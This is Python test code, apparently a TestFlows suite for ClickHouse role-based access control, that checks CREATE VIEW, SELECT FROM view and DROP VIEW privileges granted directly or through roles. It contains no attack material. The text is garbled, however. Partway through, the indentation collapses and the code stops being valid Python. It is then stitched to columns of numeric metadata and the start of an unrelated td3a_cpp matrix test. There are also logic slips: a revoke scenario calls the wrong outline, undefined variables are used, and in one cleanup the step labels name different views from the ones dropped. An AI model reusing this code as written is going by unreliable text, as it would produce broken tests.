                with Then("I attempt to create view as the user with CREATE VIEW privilege"):
                    node.query(create_view_query.format(view_name=view_name, table0_name=table0_name, table1_name=table1_name, table2_name=table2_name, table3_name=table3_name, table4_name=table4_name),
                        settings = [("user", f"{user_name}")], exitcode=exitcode, message=message)
                # Partial SELECT grants over the four tables actually used by
                # the query; creation is still expected to fail.
                for permutation in permutations(table_count=5):
                    with grant_select_on_table(node, permutation, grant_target_name, table0_name, table1_name, table3_name, table4_name) as tables_granted:
                        with When(f"permutation={permutation}, tables granted = {tables_granted}"):
                            with Given("I don't have a view"):
                                node.query(f"DROP VIEW IF EXISTS {view_name}")
                            with Then("I attempt to create a view as the user"):
                                node.query(create_view_query.format(view_name=view_name, table0_name=table0_name, table1_name=table1_name, table2_name=table2_name, table3_name=table3_name, table4_name=table4_name),
                                    settings = [("user", f"{user_name}")], exitcode=exitcode, message=message)
                # SELECT on all tables: creation must succeed.
                with When("I grant select on all tables"):
                    with grant_select_on_table(node, max(permutations(table_count=5))+1, grant_target_name, table0_name, table1_name, table2_name, table3_name, table4_name):
                        with Given("I don't have a view"):
                            node.query(f"DROP VIEW IF EXISTS {view_name}")
                        with Then("I attempt to create a view as the user"):
                            node.query(create_view_query.format(view_name=view_name, table0_name=table0_name, table1_name=table1_name, table2_name=table2_name, table3_name=table3_name, table4_name=table4_name),
                                settings = [("user", f"{user_name}")])
            finally:
                with Finally("I drop the view"):
                    node.query(f"DROP VIEW IF EXISTS {view_name}")
@TestScenario
def create_with_nested_views_privilege_granted_directly_or_via_role(self, node=None):
    """Check that user is able to create a view with a stored query that includes other views if and only if
    they have SELECT privilege on all the views and the source tables for those views.
    """
    user_name = f"user_{getuid()}"
    role_name = f"role_{getuid()}"
    if node is None:
        node = self.context.node
    # Privileges granted directly to the user.
    with user(node, f"{user_name}"):
        Scenario(test=create_with_nested_views,
            name="create with nested views, privilege granted directly")(grant_target_name=user_name, user_name=user_name)
    # Privileges granted to a role held by the user.
    with user(node, f"{user_name}"), role(node, f"{role_name}"):
        with When("I grant the role to the user"):
            node.query(f"GRANT {role_name} TO {user_name}")
        Scenario(test=create_with_nested_views,
            name="create with nested views, privilege granted through a role")(grant_target_name=role_name, user_name=user_name)
@TestOutline
def create_with_nested_views(self, grant_target_name, user_name, node=None):
    """Grant select and create view privileges and check that user is able to create a view
    if and only if they have all necessary privileges.

    The stored query selects from a chain of pre-created views
    (view2 -> view1 -> view0) plus table3, so SELECT is required on the
    intermediate views and their source tables.
    """
    view0_name = f"view0_{getuid()}"
    view1_name = f"view1_{getuid()}"
    view2_name = f"view2_{getuid()}"
    view3_name = f"view3_{getuid()}"
    table0_name = f"table0_{getuid()}"
    table1_name = f"table1_{getuid()}"
    table2_name = f"table2_{getuid()}"
    table3_name = f"table3_{getuid()}"
    exitcode, message = errors.not_enough_privileges(name=f"{user_name}")
    create_view_query = "CREATE VIEW {view3_name} AS SELECT y FROM {table3_name} UNION ALL SELECT y FROM {view2_name}"
    if node is None:
        node = self.context.node
    with table(node, f"{table0_name},{table1_name},{table2_name},{table3_name}"):
        try:
            with Given("I have some views"):
                node.query(f"CREATE VIEW {view0_name} AS SELECT y FROM {table0_name}")
                node.query(f"CREATE VIEW {view1_name} AS SELECT y FROM {table1_name} WHERE y IN (SELECT y FROM {view0_name} WHERE y<2)")
                node.query(f"CREATE VIEW {view2_name} AS SELECT y FROM {table2_name} JOIN {view1_name} USING y")
            with When("I grant CREATE VIEW privilege"):
                node.query(f"GRANT CREATE VIEW ON {view3_name} TO {grant_target_name}")
            # No SELECT granted yet, so creation must fail.
            with Then("I attempt to create view as the user with CREATE VIEW privilege"):
                node.query(create_view_query.format(view3_name=view3_name, view2_name=view2_name, table3_name=table3_name),
                    settings = [("user",f"{user_name}")], exitcode=exitcode, message=message)
            # Full permutation sweep only under stress; otherwise a curated
            # subset of representative grant combinations.
            for permutation in ([0,1,2,3,7,11,15,31,39,79,95],permutations(table_count=7))[self.context.stress]:
                with grant_select_on_table(node, permutation, grant_target_name, view2_name, table3_name, view1_name, table2_name, view0_name, table1_name, table0_name) as tables_granted:
                    with When(f"permutation={permutation}, tables granted = {tables_granted}"):
                        with Given("I don't have a view"):
                            node.query(f"DROP VIEW IF EXISTS {view3_name}")
                        with Then("I attempt to create a view as the user"):
                            node.query(create_view_query.format(view3_name=view3_name, view2_name=view2_name, table3_name=table3_name),
                                settings = [("user", f"{user_name}")], exitcode=exitcode, message=message)
            # SELECT on every view and source table: creation must succeed.
            with When("I grant select on all views"):
                with grant_select_on_table(node, max(permutations(table_count=7))+1, grant_target_name, view0_name, view1_name, view2_name, table0_name, table1_name, table2_name, table3_name):
                    with Given("I don't have a view"):
                        node.query(f"DROP VIEW IF EXISTS {view3_name}")
                    with Then("I attempt to create a view as the user"):
                        node.query(create_view_query.format(view3_name=view3_name, view2_name=view2_name, table3_name=table3_name),
                            settings = [("user", f"{user_name}")])
        finally:
            with Finally("I drop the views"):
                # Drop in reverse dependency order. Step names fixed to match
                # the view each query actually drops (they were swapped:
                # "I drop view0" used to drop view3, and so on).
                with When("I drop view3", flags=TE):
                    node.query(f"DROP VIEW IF EXISTS {view3_name}")
                with And("I drop view2", flags=TE):
                    node.query(f"DROP VIEW IF EXISTS {view2_name}")
                with And("I drop view1", flags=TE):
                    node.query(f"DROP VIEW IF EXISTS {view1_name}")
                with And("I drop view0", flags=TE):
                    node.query(f"DROP VIEW IF EXISTS {view0_name}")
@TestSuite
@Requirements(
RQ_SRS_006_RBAC_View_Select("1.0"),
)
def select(self, node=None):
"""Test the RBAC functionality of the `SELECT FROM view` command.
"""
Scenario(run=select_without_select_privilege)
Scenario(run=select_with_select_privilege_granted_directly_or_via_role)
Scenario(run=select_with_select_privilege_revoked_directly_or_from_role)
Scenario(run=select_without_source_table_privilege)
Scenario(run=select_with_source_table_privilege_granted_directly_or_via_role)
Scenario(run=select_with_subquery_privilege_granted_directly_or_via_role)
Scenario(run=select_with_join_query_privilege_granted_directly_or_via_role)
Scenario(run=select_with_union_query_privilege_granted_directly_or_via_role)
Scenario(run=select_with_join_union_subquery_privilege_granted_directly_or_via_role)
Scenario(run=select_with_nested_views_privilege_granted_directly_or_via_role)
@TestScenario
def select_without_select_privilege(self, node=None):
"""Check that user is unable to select on a view without view SELECT privilege.
"""
user_name = f"user_{getuid()}"
view_name = f"view_{getuid()}"
exitcode, message = errors.not_enough_privileges(name=f"{user_name}")
if node is None:
node = self.context.node
with user(node, f"{user_name}"):
try:
with When("I have a view"):
node.query(f"DROP VIEW IF EXISTS {view_name}")
node.query(f"CREATE VIEW {view_name} AS SELECT 1")
with Then("I try to select from view without privilege as the user"):
node.query(f"SELECT * FROM {view_name}", settings = [("user",f"{user_name}")],
exitcode=exitcode, message=message)
finally:
with Finally("I drop the view"):
node.query(f"DROP VIEW IF EXISTS {view_name}")
@TestScenario
def select_with_select_privilege_granted_directly_or_via_role(self, node=None):
"""Check that user is able to select from a view if and only if they have select privilege on that view, either directly or from a role.
"""
user_name = f"user_{getuid()}"
role_name = f"role_{getuid()}"
if node is None:
node = self.context.node
with user(node, f"{user_name}"):
Scenario(test=select_with_select_privilege,
name="select with select privilege granted directly")(grant_target_name=user_name, user_name=user_name)
with user(node, f"{user_name}"), role(node, f"{role_name}"):
with When("I grant the role to the user"):
node.query(f"GRANT {role_name} TO {user_name}")
Scenario(test=select_with_select_privilege,
name="select with select privilege granted through a role")(grant_target_name=role_name, user_name=user_name)
@TestOutline
def select_with_select_privilege(self, user_name, grant_target_name, node=None):
"""Grant SELECT privilege on a view and check the user is able to SELECT from it.
"""
view_name = f"view_{getuid()}"
if node is None:
node = self.context.node
try:
with When("I have a view"):
node.query(f"DROP VIEW IF EXISTS {view_name}")
node.query(f"CREATE VIEW {view_name} AS SELECT 1")
with And("I grant SELECT privilege for the view"):
node.query(f"GRANT SELECT ON {view_name} TO {grant_target_name}")
with Then("I attempt to select from view with privilege as the user"):
output = node.query(f"SELECT count(*) FROM {view_name}", settings = [("user",f"{user_name}")]).output
assert output == '1', error()
finally:
with Finally("I drop the view"):
node.query(f"DROP VIEW IF EXISTS {view_name}")
@TestScenario
def select_with_select_privilege_revoked_directly_or_from_role(self, node=None):
"""Check that user is unable to select from a view if their SELECT privilege is revoked, either directly or from a role.
"""
user_name = f"user_{getuid()}"
role_name = f"role_{getuid()}"
if node is None:
node = self.context.node
with user(node, f"{user_name}"):
Scenario(test=select_with_select_privilege,
name="select with select privilege revoked directly")(grant_target_name=user_name, user_name=user_name)
with user(node, f"{user_name}"), role(node, f"{role_name}"):
with When("I grant the role to the user"):
node.query(f"GRANT {role_name} TO {user_name}")
Scenario(test=select_with_select_privilege,
name="select with select privilege revoked from a role")(grant_target_name=role_name, user_name=user_name)
@TestOutline
def select_with_revoked_select_privilege(self, user_name, grant_target_name, node=None):
"""Grant and revoke SELECT privilege on a view and check the user is unable to SELECT from it.
"""
view_name = f"view_{getuid()}"
if node is None:
node = self.context.node
try:
with When("I have a view"):
node.query(f"DROP VIEW IF EXISTS {view_name}")
node.query(f"CREATE VIEW {view_name} AS SELECT 1")
with And("I grant SELECT privilege for the view"):
node.query(f"GRANT SELECT ON {view_name} TO {grant_target_name}")
with And("I revoke SELECT privilege for the view"):
node.query(f"REVOKE SELECT ON {view_name} FROM {grant_target_name}")
with Then("I attempt to select from view with privilege as the user"):
node.query(f"SELECT count(*) FROM {view_name}", settings = [("user",f"{user_name}")],
exitcode=exitcode, message=message)
finally:
with Finally("I drop the view"):
node.query(f"DROP VIEW IF EXISTS {view_name}")
@TestScenario
def select_without_source_table_privilege(self, node=None):
"""Check that user is unable to select from a view without SELECT privilege for the source table.
"""
user_name = f"user_{getuid()}"
view_name = f"view_{getuid()}"
table_name = f"table_{getuid()}"
exitcode, message = errors.not_enough_privileges(name=f"{user_name}")
if node is None:
node = self.context.node
with table(node, f"{table_name}"):
with user(node, f"{user_name}"):
try:
with When("I create a view from the source table"):
node.query(f"DROP VIEW IF EXISTS {view_name}")
node.query(f"CREATE VIEW {view_name} AS SELECT * FROM {table_name}")
with And("I grant view select privilege to the user"):
node.query(f"GRANT SELECT ON {view_name} TO {user_name}")
with Then("I attempt to select from view without privilege on the source table"):
node.query(f"SELECT count(*) FROM {view_name}", settings = [("user",f"{user_name}")],
exitcode=exitcode, message=message)
finally:
with Finally("I drop the view"):
node.query(f"DROP VIEW IF EXISTS {view_name}")
@TestScenario
def select_with_source_table_privilege_granted_directly_or_via_role(self, node=None):
"""Check that user is able to select from a view, with source table in the stored query, if and only if
the user has SELECT privilege for the view and the source table, either directly or from a role.
"""
user_name = f"user_{getuid()}"
role_name = f"role_{getuid()}"
if node is None:
node = self.context.node
with user(node, f"{user_name}"):
Scenario(test=select_with_source_table_privilege,
name="select with source table, privilege granted directly")(grant_target_name=user_name, user_name=user_name)
with user(node, f"{user_name}"), role(node, f"{role_name}"):
with When("I grant the role to the user"):
node.query(f"GRANT {role_name} TO {user_name}")
Scenario(test=select_with_source_table_privilege,
name="select with source table, privilege granted through a role")(grant_target_name=role_name, user_name=user_name)
@TestOutline
def select_with_source_table_privilege(self, user_name, grant_target_name, node=None):
"""Grant SELECT privilege on view and the source table for that view and check the user is able to SELECT from the view.
"""
view_name = f"view_{getuid()}"
table_name = f"table_{getuid()}"
if node is None:
node = self.context.node
with table(node, f"{table_name}"):
try:
with Given("I have a view with a source table"):
node.query(f"DROP VIEW IF EXISTS {view_name}")
node.query(f"CREATE VIEW {view_name} AS SELECT * FROM {table_name}")
with And("I grant select privileges"):
node.query(f"GRANT SELECT ON {view_name} TO {grant_target_name}")
node.query(f"GRANT SELECT ON {table_name} TO {grant_target_name}")
with Then("I check the user is able to select from the view"):
output = node.query(f"SELECT count(*) FROM {view_name}", settings = [("user", f"{user_name}")]).output
assert output == '0', error()
finally:
with Finally("I drop the view"):
node.query(f"DROP VIEW IF EXISTS {view_name}")
@TestScenario
def select_with_subquery_privilege_granted_directly_or_via_role(self, node=None):
"""Check that user is able to select from a view where the stored query has two subqueries if and only if
the user has SELECT privilege for that view and all tables, either directly or through a role.
"""
user_name = f"user_{getuid()}"
role_name = f"role_{getuid()}"
if node is None:
node = self.context.node
with user(node, f"{user_name}"):
Scenario(test=select_with_subquery,
name="select with subquery, privilege granted directly")(grant_target_name=user_name, user_name=user_name)
with user(node, f"{user_name}"), role(node, f"{role_name}"):
with When("I grant the role to the user"):
node.query(f"GRANT {role_name} TO {user_name}")
Scenario(test=select_with_subquery,
name="select with subquery, privilege granted through a role")(grant_target_name=role_name, user_name=user_name)
@TestOutline
def select_with_subquery(self, user_name, grant_target_name, node=None):
"""Grant SELECT on the view and tables in the stored query and check the user is able to SELECT if and only if they have SELECT privilege on all of them.
"""
view_name = f"view_{getuid()}"
table0_name = f"table0_{getuid()}"
table1_name = f"table1_{getuid()}"
table2_name = f"table2_{getuid()}"
exitcode, message = errors.not_enough_privileges(name=f"{user_name}")
select_view_query = "SELECT count(*) FROM {view_name}"
if node is None:
node = self.context.node
with table(node, f"{table0_name},{table1_name},{table2_name}"):
try:
with Given("I have a view with a subquery"):
node.query(f"DROP VIEW IF EXISTS {view_name}")
node.query(f"CREATE VIEW {view_name} AS SELECT * FROM {table0_name} WHERE y IN (SELECT y FROM {table1_name} WHERE y IN (SELECT y FROM {table2_name} WHERE y<2))")
with When("I grant SELECT privilege on view"):
node.query(f"GRANT SELECT ON {view_name} TO {grant_target_name}")
with Then("I attempt to select from the view as the user"):
node.query(select_view_query.format(view_name=view_name), settings = [("user",f"{user_name}")], exitcode=exitcode, message=message)
for permutation in permutations(table_count=3):
with grant_select_on_table(node, permutation, grant_target_name, table0_name, table1_name, table2_name) as tables_granted:
with When(f"permutation={permutation}, tables granted = {tables_granted}"):
with Then("I attempt to select from a view as the user"):
node.query(select_view_query.format(view_name=view_name), settings = [("user", f"{user_name}")], exitcode=exitcode, message=message)
with When("I grant select on all tables"):
with grant_select_on_table(node, max(permutations(table_count=3))+1, grant_target_name, table0_name, table1_name, table2_name):
with Then("I attempt to select from a view as the user"):
output = node.query(select_view_query.format(view_name=view_name), settings = [("user", f"{user_name}")]).output
assert output == '0', error()
finally:
with Finally("I drop the view"):
node.query(f"DROP VIEW IF EXISTS {view_name}")
@TestScenario
def select_with_join_query_privilege_granted_directly_or_via_role(self, node=None):
"""Check that user is able to select from a view where the stored query includes a `JOIN` statement if and only if
the user has SELECT privilege on all the tables and the view, either directly or through a role.
"""
user_name = f"user_{getuid()}"
role_name = f"role_{getuid()}"
if node is None:
node = self.context.node
with user(node, f"{user_name}"):
Scenario(test=select_with_join_query,
name="select with join, privilege granted directly")(grant_target_name=user_name, user_name=user_name)
with user(node, f"{user_name}"), role(node, f"{role_name}"):
with When("I grant the role to the user"):
node.query(f"GRANT {role_name} TO {user_name}")
Scenario(test=select_with_join_query,
name="select with join, privilege granted through a role")(grant_target_name=role_name, user_name=user_name)
@TestOutline
def select_with_join_query(self, user_name, grant_target_name, node=None):
"""Grant SELECT on the view and tables in the stored query and check the user is able to SELECT if and only if they have SELECT privilege on all of them.
"""
view_name = f"view_{getuid()}"
table0_name = f"table0_{getuid()}"
table1_name = f"table1_{getuid()}"
exitcode, message = errors.not_enough_privileges(name=f"{user_name}")
select_view_query = "SELECT count(*) FROM {view_name}"
if node is None:
node = self.context.node
with table(node, f"{table0_name},{table1_name}"):
try:
with Given("I have a view with a JOIN statement"):
node.query(f"DROP VIEW IF EXISTS {view_name}")
node.query(f"CREATE VIEW {view_name} AS SELECT * FROM {table0_name} JOIN {table1_name} USING d")
with When("I grant SELECT privilege on view"):
node.query(f"GRANT SELECT ON {view_name} TO {grant_target_name}")
with Then("I attempt to select from the view as the user"):
node.query(select_view_query.format(view_name=view_name), settings = [("user",f"{user_name}")], exitcode=exitcode, message=message)
for permutation in permutations(table_count=2):
with grant_select_on_table(node, permutation, grant_target_name, table0_name, table1_name) as tables_granted:
with When(f"permutation={permutation}, tables granted = {tables_granted}"):
with Then("I attempt to select from a view as the user"):
node.query(select_view_query.format(view_name=view_name), settings = [("user", f"{user_name}")], exitcode=exitcode, message=message)
with When("I grant select on all tables"):
with grant_select_on_table(node, max(permutations(table_count=2))+1, grant_target_name, table0_name, table1_name):
with Then("I attempt to select from a view as the user"):
node.query(select_view_query.format(view_name=view_name), settings = [("user", f"{user_name}")])
finally:
with Finally("I drop the view"):
node.query(f"DROP VIEW IF EXISTS {view_name}")
@TestScenario
def select_with_union_query_privilege_granted_directly_or_via_role(self, node=None):
"""Check that user is able to select from a view where the stored query includes a `UNION ALL` statement if and only if
the user has SELECT privilege on all the tables and the view, either directly or through a role.
"""
user_name = f"user_{getuid()}"
role_name = f"role_{getuid()}"
if node is None:
node = self.context.node
with user(node, f"{user_name}"):
Scenario(test=select_with_union_query,
name="select with union, privilege granted directly")(grant_target_name=user_name, user_name=user_name)
with user(node, f"{user_name}"), role(node, f"{role_name}"):
with When("I grant the role to the user"):
node.query(f"GRANT {role_name} TO {user_name}")
Scenario(test=select_with_union_query,
name="select with union, privilege granted through a role")(grant_target_name=role_name, user_name=user_name)
@TestOutline
def select_with_union_query(self, user_name, grant_target_name, node=None):
"""Grant SELECT on the view and tables in the stored query and check the user is able to SELECT if and only if they have SELECT privilege on all of them.
"""
view_name = f"view_{getuid()}"
table0_name = f"table0_{getuid()}"
table1_name = f"table1_{getuid()}"
exitcode, message = errors.not_enough_privileges(name=f"{user_name}")
select_view_query = "SELECT count(*) FROM {view_name}"
if node is None:
node = self.context.node
with table(node, f"{table0_name},{table1_name}"):
try:
with Given("I have a view with a UNION statement"):
node.query(f"DROP VIEW IF EXISTS {view_name}")
node.query(f"CREATE VIEW {view_name} AS SELECT * FROM {table0_name} UNION ALL SELECT * FROM {table1_name}")
with When("I grant SELECT privilege on view"):
node.query(f"GRANT SELECT ON {view_name} TO {grant_target_name}")
with Then("I attempt to select from the view as the user"):
node.query(select_view_query.format(view_name=view_name), settings = [("user",f"{user_name}")], exitcode=exitcode, message=message)
for permutation in permutations(table_count=2):
with grant_select_on_table(node, permutation, grant_target_name, table0_name, table1_name) as tables_granted:
with When(f"permutation={permutation}, tables granted = {tables_granted}"):
with Then("I attempt to select from a view as the user"):
node.query(select_view_query.format(view_name=view_name), settings = [("user", f"{user_name}")], exitcode=exitcode, message=message)
with When("I grant select on all tables"):
with grant_select_on_table(node, max(permutations(table_count=2))+1, grant_target_name, table0_name, table1_name):
with Then("I attempt to select from a view as the user"):
node.query(select_view_query.format(view_name=view_name), settings = [("user", f"{user_name}")])
finally:
with Finally("I drop the view"):
node.query(f"DROP VIEW IF EXISTS {view_name}")
@TestScenario
def select_with_join_union_subquery_privilege_granted_directly_or_via_role(self, node=None):
"""Check that user is able to select from a view with a stored query that includes `UNION ALL`, `JOIN` and two subqueries
if and only if the user has SELECT privilege on all the tables and the view, either directly or through a role.
"""
user_name = f"user_{getuid()}"
role_name = f"role_{getuid()}"
if node is None:
node = self.context.node
with user(node, f"{user_name}"):
Scenario(test=select_with_join_union_subquery,
name="select with join union subquery, privilege granted directly")(grant_target_name=user_name, user_name=user_name)
with user(node, f"{user_name}"), role(node, f"{role_name}"):
with When("I grant the role to the user"):
node.query(f"GRANT {role_name} TO {user_name}")
Scenario(test=select_with_join_union_subquery,
name="select with join union subquery, privilege granted through a role")(grant_target_name=role_name, user_name=user_name)
@TestOutline
def select_with_join_union_subquery(self, grant_target_name, user_name, node=None):
"""Grant SELECT on the view and tables in the stored query and check the user is able to SELECT if and only if they have SELECT privilege on all of them.
"""
view_name = f"view_{getuid()}"
table0_name = f"table0_{getuid()}"
table1_name = f"table1_{getuid()}"
table2_name = f"table2_{getuid()}"
table3_name = f"table3_{getuid()}"
table4_name = f"table4_{getuid()}"
exitcode, message = errors.not_enough_privileges(name=f"{user_name}")
select_view_query = "SELECT count(*) FROM {view_name}"
if node is None:
node = self.context.node
with table(node, f"{table0_name},{table1_name},{table2_name},{table3_name},{table4_name}"):
try:
with Given("I have a view"):
node.query(f"DROP VIEW IF EXISTS {view_name}")
node.query(f"CREATE VIEW {view_name} AS SELECT y FROM {table0_name} JOIN {table1_name} USING y UNION ALL SELECT y FROM {table1_name} WHERE y IN (SELECT y FROM {table3_name} WHERE y IN (SELECT y FROM {table4_name} WHERE y<2))")
with When("I grant SELECT privilege on view"):
node.query(f"GRANT SELECT ON {view_name} TO {grant_target_name}")
with Then("I attempt to select from the view as the user"):
node.query(select_view_query.format(view_name=view_name), settings = [("user", f"{user_name}")], exitcode=exitcode, message=message)
for permutation in permutations(table_count=5):
with grant_select_on_table(node, permutation, grant_target_name, table0_name, table1_name, table2_name, table3_name, table4_name) as tables_granted:
with When(f"permutation={permutation}, tables granted = {tables_granted}"):
with Then("I attempt to select from a view as the user"):
node.query(select_view_query.format(view_name=view_name), settings = [("user", f"{user_name}")], exitcode=exitcode, message=message)
with When("I grant select on all tables"):
with grant_select_on_table(node, max(permutations(table_count=5))+1, grant_target_name, table0_name, table1_name, table2_name, table3_name, table4_name):
with Then("I attempt to select from a view as the user"):
node.query(select_view_query.format(view_name=view_name), settings = [("user", f"{user_name}")])
finally:
with Finally("I drop the view"):
node.query(f"DROP VIEW IF EXISTS {view_name}")
@TestScenario
def select_with_nested_views_privilege_granted_directly_or_via_role(self, node=None):
"""Check that user is able to select from a view with a stored query that includes other views if and only if
the user has select privilege on all of the views and the source tables for those views, either directly or through a role.
"""
user_name = f"user_{getuid()}"
role_name = f"role_{getuid()}"
if node is None:
node = self.context.node
with user(node, f"{user_name}"):
Scenario(test=select_with_nested_views,
name="select with nested views, privilege granted directly")(grant_target_name=user_name, user_name=user_name)
with user(node, f"{user_name}"), role(node, f"{role_name}"):
with When("I grant the role to the user"):
node.query(f"GRANT {role_name} TO {user_name}")
Scenario(test=select_with_nested_views,
name="select with nested views, privilege granted through a role")(grant_target_name=role_name, user_name=user_name)
@TestOutline
def select_with_nested_views(self, grant_target_name, user_name, node=None):
"""Grant SELECT on views and tables in the stored query and check the user is able to SELECT if and only if they have SELECT privilege on all of them.
"""
view0_name = f"view0_{getuid()}"
view1_name = f"view1_{getuid()}"
view2_name = f"view2_{getuid()}"
view3_name = f"view3_{getuid()}"
table0_name = f"table0_{getuid()}"
table1_name = f"table1_{getuid()}"
table2_name = f"table2_{getuid()}"
table3_name = f"table3_{getuid()}"
exitcode, message = errors.not_enough_privileges(name=f"{user_name}")
select_view_query = "SELECT count(*) FROM {view3_name}"
if node is None:
node = self.context.node
with table(node, f"{table0_name},{table1_name},{table2_name},{table3_name}"):
try:
with Given("I have some views"):
node.query(f"CREATE VIEW {view0_name} AS SELECT y FROM {table0_name}")
node.query(f"CREATE VIEW {view1_name} AS SELECT y FROM {view0_name} WHERE y IN (SELECT y FROM {table1_name} WHERE y<2)")
node.query(f"CREATE VIEW {view2_name} AS SELECT y FROM {view1_name} JOIN {table2_name} USING y")
node.query(f"CREATE VIEW {view3_name} AS SELECT y FROM {view2_name} UNION ALL SELECT y FROM {table3_name}")
with Then("I attempt to select from a view as the user"):
node.query(select_view_query.format(view3_name=view3_name),
settings = [("user",f"{user_name}")], exitcode=exitcode, message=message)
for permutation in ([0,1,3,5,7,13,15,23,31,45,63,95,127,173,237,247,253],permutations(table_count=8))[self.context.stress]:
with grant_select_on_table(node, permutation, grant_target_name, view3_name, table3_name, view2_name, view1_name, table2_name, view0_name, table1_name, table0_name) as tables_granted:
with When(f"permutation={permutation}, tables granted = {tables_granted}"):
with Then("I attempt to select from a view as the user"):
node.query(select_view_query.format(view3_name=view3_name),
settings = [("user", f"{user_name}")], exitcode=exitcode, message=message)
with When("I grant select on all views"):
with grant_select_on_table(node, max(permutations(table_count=8))+1, grant_target_name, view0_name, view1_name, view2_name, view3_name, table0_name, table1_name, table2_name, table3_name):
with Then("I attempt to select from a view as the user"):
node.query(select_view_query.format(view3_name=view3_name), settings = [("user", f"{user_name}")])
finally:
with Finally("I drop the views"):
with When("I drop view0", flags=TE):
node.query(f"DROP VIEW IF EXISTS {view3_name}")
with And("I drop view1", flags=TE):
node.query(f"DROP VIEW IF EXISTS {view2_name}")
with And("I drop view2", flags=TE):
node.query(f"DROP VIEW IF EXISTS {view1_name}")
with And("I drop view3", flags=TE):
node.query(f"DROP VIEW IF EXISTS {view0_name}")
@TestSuite
@Requirements(
RQ_SRS_006_RBAC_View_Drop("1.0"),
)
def drop(self, node=None):
"""Test the RBAC functionality of the `DROP VIEW` command.
"""
Scenario(run=drop_with_privilege_granted_directly_or_via_role)
Scenario(run=drop_with_revoked_privilege_revoked_directly_or_from_role)
@TestScenario
def drop_with_privilege_granted_directly_or_via_role(self, node=None):
"""Check that user is able to drop view with DROP VIEW privilege if the user has privilege directly or through a role.
"""
user_name = f"user_{getuid()}"
role_name = f"role_{getuid()}"
if node is None:
node = self.context.node
with user(node, f"{user_name}"):
Scenario(test=drop_with_privilege,
name="drop privilege granted directly")(grant_target_name=user_name, user_name=user_name)
with user(node, f"{user_name}"), role(node, f"{role_name}"):
with When("I grant the role to the user"):
node.query(f"GRANT {role_name} TO {user_name}")
Scenario(test=drop_with_privilege,
name="drop privilege granted through a role")(grant_target_name=role_name, user_name=user_name)
@TestOutline
def drop_with_privilege(self, grant_target_name, user_name, node=None):
"""Grant DROP VIEW privilege and check the user is able to successfully drop a view.
"""
view_name = f"view_{getuid()}"
exitcode, message = errors.table_does_not_exist(name=f"default.{view_name}")
if node is None:
node = self.context.node
try:
with Given("I have a view"):
node.query(f"DROP VIEW IF EXISTS {view_name}")
node.query(f"CREATE VIEW {view_name} AS SELECT 1")
with When("I grant DROP VIEW privilege"):
node.query(f"GRANT DROP VIEW ON {view_name} TO {grant_target_name}")
with And("I drop the view as the user"):
node.query(f"DROP VIEW {view_name}", settings = [("user",f"{user_name}")])
with Then("I check the table does not exist"):
node.query(f"SELECT * FROM {view_name}", exitcode=exitcode, message=message)
finally:
with Finally("I drop the view"):
node.query(f"DROP VIEW IF EXISTS {view_name}")
@TestScenario
def drop_with_revoked_privilege_revoked_directly_or_from_role(self, node=None):
"""Check that user is unable to drop view with DROP VIEW privilege revoked directly or from a role.
"""
user_name = f"user_{getuid()}"
role_name = f"role_{getuid()}"
if node is None:
node = self.context.node
with user(node, f"{user_name}"):
Scenario(test=drop_with_revoked_privilege,
name="drop privilege revoked directly")(grant_target_name=user_name, user_name=user_name)
with user(node, f"{user_name}"), role(node, f"{role_name}"):
with When("I grant the role to the user"):
node.query(f"GRANT {role_name} TO {user_name}")
Scenario(test=drop_with_revoked_privilege,
name="drop privilege revoked from a role")(grant_target_name=role_name, user_name=user_name)
@TestOutline
def drop_with_revoked_privilege(self, grant_target_name, user_name, node=None):
"""Revoke DROP VIEW privilege and check the user is unable to DROP a view.
"""
view_name = f"view_{getuid()}"
exitcode, message = errors.not_enough_privileges(name=f"{user_name}")
if node is None:
node = self.context.node
try:
with Given("I have a view"):
node.query(f"DROP VIEW IF EXISTS {view_name}")
node.query(f"CREATE VIEW {view_name} AS SELECT 1")
with When("I grant DROP VIEW privilege"):
node.query(f"GRANT DROP VIEW ON {view_name} TO {grant_target_name}")
with And("I revoke DROP VIEW privilege"):
node.query(f"REVOKE DROP VIEW ON {view_name} FROM {grant_target_name}")
with Then("I drop the view as the user"):
node.query(f"DROP VIEW {view_name}", settings = [("user",f"{user_name}")],
exitcode=exitcode, message=message)
finally:
with Finally("I drop the view"):
node.query(f"DROP VIEW IF EXISTS {view_name}")
@TestFeature
@Requirements(
RQ_SRS_006_RBAC_View("1.0"),
)
@Name("view")
def feature(self, stress=None, parallel=None, node="clickhouse1"):
self.context.node = self.context.cluster.node(node)
if stress is not None:
self.context.stress = stress
if parallel is not None:
self.context.stress = parallel
tasks = []
pool = Pool(3)
try:
try:
for suite in loads(current_module(), Suite):
run_scenario(pool, tasks, suite)
finally:
join(tasks)
finally:
pool.close()
| 51.877042
| 242
| 0.660716
| 8,644
| 60,333
| 4.39727
| 0.019435
| 0.052407
| 0.03236
| 0.022731
| 0.970508
| 0.963825
| 0.952591
| 0.94733
| 0.940174
| 0.923283
| 0
| 0.010217
| 0.234266
| 60,333
| 1,162
| 243
| 51.921687
| 0.812528
| 0.097873
| 0
| 0.777778
| 0
| 0.006803
| 0.302778
| 0.012918
| 0
| 0
| 0
| 0
| 0.005669
| 1
| 0.049887
| false
| 0
| 0.005669
| 0
| 0.055556
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
60ba39d9c066d15edc2c028cda4222e23d077191
| 3,658
|
py
|
Python
|
tests/test_tutorial_mul.py
|
sdpython/td3a_cpp
|
f78cdc1e5b97df747b088e9c4c339b25bae7fba9
|
[
"MIT"
] | 1
|
2020-09-12T16:36:55.000Z
|
2020-09-12T16:36:55.000Z
|
tests/test_tutorial_mul.py
|
AmineDiro/td3a_cpp
|
16b669babf29335da2c76a14eaa886d16af210da
|
[
"MIT"
] | null | null | null |
tests/test_tutorial_mul.py
|
AmineDiro/td3a_cpp
|
16b669babf29335da2c76a14eaa886d16af210da
|
[
"MIT"
] | 6
|
2020-02-03T12:02:48.000Z
|
2021-01-21T16:36:54.000Z
|
"""
Unit tests for ``random_strategy``.
"""
import unittest
import numpy
from numpy.testing import assert_almost_equal
from td3a_cpp.tutorial.mul_cython_omp import dmul_cython_omp
class TestTutorialMul(unittest.TestCase):
def test_matrix_mul(self):
va = numpy.random.randn(3, 4).astype(numpy.float64)
vb = numpy.random.randn(4, 5).astype(numpy.float64)
res1 = va @ vb
